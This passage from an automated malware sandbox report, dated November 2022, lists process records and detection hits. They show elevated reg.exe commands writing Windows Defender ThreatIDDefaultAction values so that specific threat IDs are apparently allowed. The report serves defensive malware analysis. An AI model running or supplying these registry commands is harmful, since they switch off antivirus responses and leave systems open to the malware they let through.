0x11d0000
|
| Modulesize: |
364544
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Very long cmdline option found, this is very uncommon (may be encrypted or packed) |
HIPS / PFW / Operating System Protection Evasion |
Command and Scripting Interpreter
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
6192
|
| Target ID: |
39
|
| Parent PID: |
6176
|
| Name: |
reg.exe
|
| Class: |
system-tools
|
| Path: |
C:\Windows\SysWOW64\reg.exe
|
| Commandline: |
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
|
| Size: |
59392
|
| MD5: |
CEE2A7E57DF2A159A065A34913A055C2
|
| Time: |
19:04:51
|
| Date: |
24/11/2022
|
| Reason: |
newprocess
|
| Reputation: |
timeout
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0xbe0000
|
| Modulesize: |
335872
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Uses cmd line tools excessively to alter registry or file data |
Persistence and Installation Behavior |
Command and Scripting Interpreter
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Uses reg.exe to modify the Windows registry |
System Summary |
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\reg.exe
|
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v
225451 /t REG_SZ /d 6 /reg:64
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
6180
|
| Target ID: |
40
|
| Parent PID: |
6604
|
| Name: |
reg.exe
|
| Class: |
system-tools
|
| Path: |
C:\Windows\SysWOW64\reg.exe
|
| Commandline: |
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v
225451 /t REG_SZ /d 6 /reg:64
|
| Size: |
59392
|
| MD5: |
CEE2A7E57DF2A159A065A34913A055C2
|
| Time: |
19:04:52
|
| Date: |
24/11/2022
|
| Reason: |
newprocess
|
| Reputation: |
timeout
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0xbe0000
|
| Modulesize: |
335872
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Uses cmd line tools excessively to alter registry or file data |
Persistence and Installation Behavior |
Command and Scripting Interpreter
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Uses reg.exe to modify the Windows registry |
System Summary |
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\reg.exe
|
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v
256596 /t REG_SZ /d 6 /reg:32
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
4520
|
| Target ID: |
41
|
| Parent PID: |
6604
|
| Name: |
reg.exe
|
| Class: |
system-tools
|
| Path: |
C:\Windows\SysWOW64\reg.exe
|
| Commandline: |
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v
256596 /t REG_SZ /d 6 /reg:32
|
| Size: |
59392
|
| MD5: |
CEE2A7E57DF2A159A065A34913A055C2
|
| Time: |
19:04:53
|
| Date: |
24/11/2022
|
| Reason: |
newprocess
|
| Reputation: |
timeout
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0xbe0000
|
| Modulesize: |
335872
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Uses cmd line tools excessively to alter registry or file data |
Persistence and Installation Behavior |
Command and Scripting Interpreter
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Uses reg.exe to modify the Windows registry |
System Summary |
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\reg.exe
|
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v
256596 /t REG_SZ /d 6 /reg:64
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
2992
|
| Target ID: |
42
|
| Parent PID: |
6604
|
| Name: |
reg.exe
|
| Class: |
system-tools
|
| Path: |
C:\Windows\SysWOW64\reg.exe
|
| Commandline: |
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v
256596 /t REG_SZ /d 6 /reg:64
|
| Size: |
59392
|
| MD5: |
CEE2A7E57DF2A159A065A34913A055C2
|
| Time: |
19:04:53
|
| Date: |
24/11/2022
|
| Reason: |
newprocess
|
| Reputation: |
timeout
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0xbe0000
|
| Modulesize: |
335872
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Uses cmd line tools excessively to alter registry or file data |
Persistence and Installation Behavior |
Command and Scripting Interpreter
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Uses reg.exe to modify the Windows registry |
System Summary |
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\reg.exe
|
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v
242872 /t REG_SZ /d 6 /reg:32
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
1364
|
| Target ID: |
43
|
| Parent PID: |
6604
|
| Name: |
reg.exe
|
| Class: |
system-tools
|
| Path: |
C:\Windows\SysWOW64\reg.exe
|
| Commandline: |
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v
242872 /t REG_SZ /d 6 /reg:32
|
| Size: |
59392
|
| MD5: |
CEE2A7E57DF2A159A065A34913A055C2
|
| Time: |
19:04:54
|
| Date: |
24/11/2022
|
| Reason: |
newprocess
|
| Reputation: |
timeout
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0xbe0000
|
| Modulesize: |
335872
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Uses cmd line tools excessively to alter registry or file data |
Persistence and Installation Behavior |
Command and Scripting Interpreter
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Uses reg.exe to modify the Windows registry |
System Summary |
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\reg.exe
|
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v
242872 /t REG_SZ /d 6 /reg:64
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
6216
|
| Target ID: |
44
|
| Parent PID: |
6604
|
| Name: |
reg.exe
|
| Class: |
system-tools
|
| Path: |
C:\Windows\SysWOW64\reg.exe
|
| Commandline: |
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v
242872 /t REG_SZ /d 6 /reg:64
|
| Size: |
59392
|
| MD5: |
CEE2A7E57DF2A159A065A34913A055C2
|
| Time: |
19:04:54
|
| Date: |
24/11/2022
|
| Reason: |
newprocess
|
| Reputation: |
timeout
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0xbe0000
|
| Modulesize: |
335872
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Uses cmd line tools excessively to alter registry or file data |
Persistence and Installation Behavior |
Command and Scripting Interpreter
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Uses reg.exe to modify the Windows registry |
System Summary |
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\reg.exe
|
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v
2147749373 /t REG_SZ /d 6 /reg:32
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
6156
|
| Target ID: |
45
|
| Parent PID: |
6604
|
| Name: |
reg.exe
|
| Class: |
system-tools
|
| Path: |
C:\Windows\SysWOW64\reg.exe
|
| Commandline: |
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v
2147749373 /t REG_SZ /d 6 /reg:32
|
| Size: |
59392
|
| MD5: |
CEE2A7E57DF2A159A065A34913A055C2
|
| Time: |
19:04:54
|
| Date: |
24/11/2022
|
| Reason: |
newprocess
|
| Reputation: |
timeout
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0xbe0000
|
| Modulesize: |
335872
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Uses cmd line tools excessively to alter registry or file data |
Persistence and Installation Behavior |
Command and Scripting Interpreter
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Uses reg.exe to modify the Windows registry |
System Summary |
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\reg.exe
|
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v
2147749373 /t REG_SZ /d 6 /reg:64
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
6232
|
| Target ID: |
46
|
| Parent PID: |
6604
|
| Name: |
reg.exe
|
| Class: |
system-tools
|
| Path: |
C:\Windows\SysWOW64\reg.exe
|
| Commandline: |
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v
2147749373 /t REG_SZ /d 6 /reg:64
|
| Size: |
59392
|
| MD5: |
CEE2A7E57DF2A159A065A34913A055C2
|
| Time: |
19:04:55
|
| Date: |
24/11/2022
|
| Reason: |
newprocess
|
| Reputation: |
timeout
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0xbe0000
|
| Modulesize: |
335872
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Uses cmd line tools excessively to alter registry or file data |
Persistence and Installation Behavior |
Command and Scripting Interpreter
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Uses reg.exe to modify the Windows registry |
System Summary |
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\reg.exe
|
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v
2147807942 /t REG_SZ /d 6 /reg:32
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
1876
|
| Target ID: |
47
|
| Parent PID: |
6604
|
| Name: |
reg.exe
|
| Class: |
system-tools
|
| Path: |
C:\Windows\SysWOW64\reg.exe
|
| Commandline: |
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v
2147807942 /t REG_SZ /d 6 /reg:32
|
|
